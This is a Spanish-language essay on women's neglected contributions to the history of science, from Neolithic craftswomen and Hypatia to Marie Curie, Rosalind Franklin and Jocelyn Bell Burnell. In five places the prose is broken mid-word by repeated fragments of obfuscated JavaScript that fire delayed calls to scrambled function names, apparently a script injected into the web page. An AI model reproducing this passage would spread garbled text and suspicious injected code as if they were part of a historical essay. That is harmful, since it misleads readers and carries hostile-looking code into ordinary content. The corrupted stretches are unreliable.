EL LUGAR DE LAS MUJERES EN LA HISTORIA DE LA CIENCIA

Autor: Mª del Señor Guisado Becerra

La historia de la ciencia es incompleta debido al olvido de un gran número de mujeres científicas porque, en parte, ha sido escrita     mayoritariamente por hombres. Pero desde tiempos muy remotos  hasta   nuestros días las mujeres han sido claves en el avance de la ciencia. Por ello, es imprescindible el reconocimiento de estas mujeres y una revisión de su contribución a las distintas disciplinas para completar la verdadera y completa   historia de la ciencia.

De la historia de la ciencia sólo conocemos una parte, aquella en la cual los protagonistas fueron hombres. Sin embargo, la historia de la ciencia está también hecha por mujeres. Es pues una historia incompleta y elaborada sobre la base del olvido de un gran número de mujeres científicas, en gran parte, debido al hecho de que los historiadores han sido mayoritariamente hombres.

Pero las mujeres han tenido mucha importancia en el avance de la ciencia desde tiempos muy remotos. Hacia el año 8.000 antes de nuestra era, en el Próximo Oriente, desarrollaron técnicas para la transformación de algunos materiales: arcilla, fabricación del pan, etc.

Hacia el año 1.200 a. d. c., las mujeres en Mesopotamia, fabricaban perfumes convirtiéndose así en las primeras químicas.

En la Antigua Grecia, hubo momentos en los que las mujeres se movían libremente por la sociedad y compartían las discusiones filosóficas con los hombres, de hecho escuelas como la platónica o la pitagórica las admitían en su seno. Después las mujeres perdieron su prestigio durante siglos, aunque a pesar de esto las mujeres seguían interesándose por la ciencia como Agnodice que vestida de hombre ejerció su profesión médica con éxito entre las mujeres. O por supuesto, la famosa Hipatia de Alejandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andría, filósofa, matemática y astrónoma, que fue brutalmente asesinada por ser considerada una representante peligrosa del pensamiento pagano.

Durante la Edad Media, una de las etapas más oscuras de la historia de la ciencia, los científicos fueron censurados por la Iglesia, y las mujeres tuvieron vedada hasta la lectura y la escritura. En esta situación, muchos hombres y mujeres optaron por la vida monástica y conventual donde podían aprender. Además, en esta época los monasterios servían también como hospitales en los que se preparaban sustancias medicinales exigiendo esto una serie de conocimientos científicos. En este periodo destaca Hildegarda de Bingen que escribió obras de carácter científico sobre las propiedades curativas de plantas y animales o sobre el origen y tratamiento de las enfermedades. Pero hay que destacar sobre todo a las mujeres de la Escuela Médica de Salerno donde muchas, como Trótula, pudieron estudiar y ejercer la medicina.

Pero es en el Renacimiento cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando se empezó a liberar la razón humana del oscuro vacío intelectual en el que estaba sumida.

En el siglo XVII hicieron su aparición las sociedades científicas en las que las mujeres también estaban excluidas pero otra vez se las ingeniaron y crearon las revistas científicas para damas. En este siglo no podemos olvidar a Marie Meurdrac que publicó “La Chymie charitable et facile en faveur des dames”, el primer libro de química escrito por una mujer. Otras mujeres que escribieron obras de divulgación científica un siglo más tarde son Jane Marcel y Marie Anne Pierrette Paulze, ésta última prosiguió los trabajos de su esposo el químico Lavoisier.

La exclusión de las mujeres de las Academias Científicas no sólo sucedió en los inicios. De hecho, la Académie des Sciences de París se negó a admitir a Marie Curie un año antes de que le concedieran el Premio Nobel.

A lo largo del siglo XVIII la afición por los trabajos científicos de carácter naturalista fue aumentandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando entre la gente culta. Pero el trabajo científico de las mujeres quedó centrado sobre todo en la recolección y clasificación de plantas, animales, fósiles, etc. o en otros casos a la función de ayudantes de hermanos y maridos. Mujeres notables en estas actividades fueron la entomóloga Marie Anna Blackburne, las botánicas Elizabeth Blackwell y Mary Granville Delany, las geólogas Martine de Beausoleil y Mary Anning, etc.

Hasta finales del siglo XIX las mujeres no pudieron acceder a la Universidad. En principio tenían que pedir permiso para matricularse oficialmente, situación que se mantuvo hasta 1910, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando las mujeres alcanzaron el libre acceso a la Universidad. Desde entonces, las mujeres se han ido incorporandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando al trabajo y, también, al mundo de la Ciencia y de la Tecnología en el mundo occidental. Aunque por desgracia, la mayoría de las mujeres del planeta no han ejercido completamente su derecho.

Para terminar reseñar aquí algunas de las científicas más importantes de los últimos siglos, algunas olvidadas por la historia, que pueden servir de ejemplo a la futura generación de mujeres jóvenes interesadas en la Ciencia:

- Marie Curie. Pionera en el campo de la radioactividad, fue la primera persona en recibir dos premios Nobel y la primera mujer en ser profesora en la Universidad de París.

- Rosalind Franklin. Sus fotografías por difracción de rayos X fueron claves para que Watson y Crick pudieran proponer el modelo de doble hélice del ADN que les proporcionaría el Premio Nobel en 1962 junto a Maurice Wilkins.

- Jocelyn Bell Burnell. Astrofísica descubridora de la primera radioseñal de pulsar junto a Antony Hewish, aunque no obtuvo el Premio Nobel junto a éste por su descubrimiento.

- Lise Meitner. Física descubridora del radioelemento protactinio.

- Dorothy Crowfoot Hodgkin. Química pionera en la aplicación de rayos X a la bioquímica.

- Mileva Marić. Matemática y primera mujer de Albert Einstein. El grado de participación en sus descubrimientos es muy discutido fuera del ámbito científico.

- Rachel Carson. Bióloga clave en ecología y en la generación de la moderna conciencia ambiental.

- Jane Goodall. Primatóloga dedicada al estudio del comportamiento de los chimpancés en África y a educar y promover estilos de vida más sostenibles en todo el planeta.

Cómo podemos ver, sólo a partir de una revisión de la contribución de las mujeres a las diferentes disciplinas científicas, se podrá completar la historia de la ciencia.

Webgrafía:

  • http://www.cienciaescolar.com/CIENCIA%20FEMENINO/Mujeres_Cienti-ficas.htm
  • http://endrino.pntic.mec.es/hotp0054/teresaclaramunt/mujerciencia.htm
  • http://www.nodo50.org/laotramirada/pdf/02mujeres_cientificas.pdf
  • http://www.oei.es/salactsi/Mujercie.pdf
  • http://www.ojocientifico.com/2009/07/05/las-10-mujeres-cientificas-mas-importantes-de-la-historia
  • http://quark.prbb.org/27/027060.htm

Escribe tu opinion

Cuentanos lo que estas pensando ...
y oh, si quieres una imagen para mostrar con su comentario, ve a buscar un gravatar!

Tu debes estar conectado para poder comentar.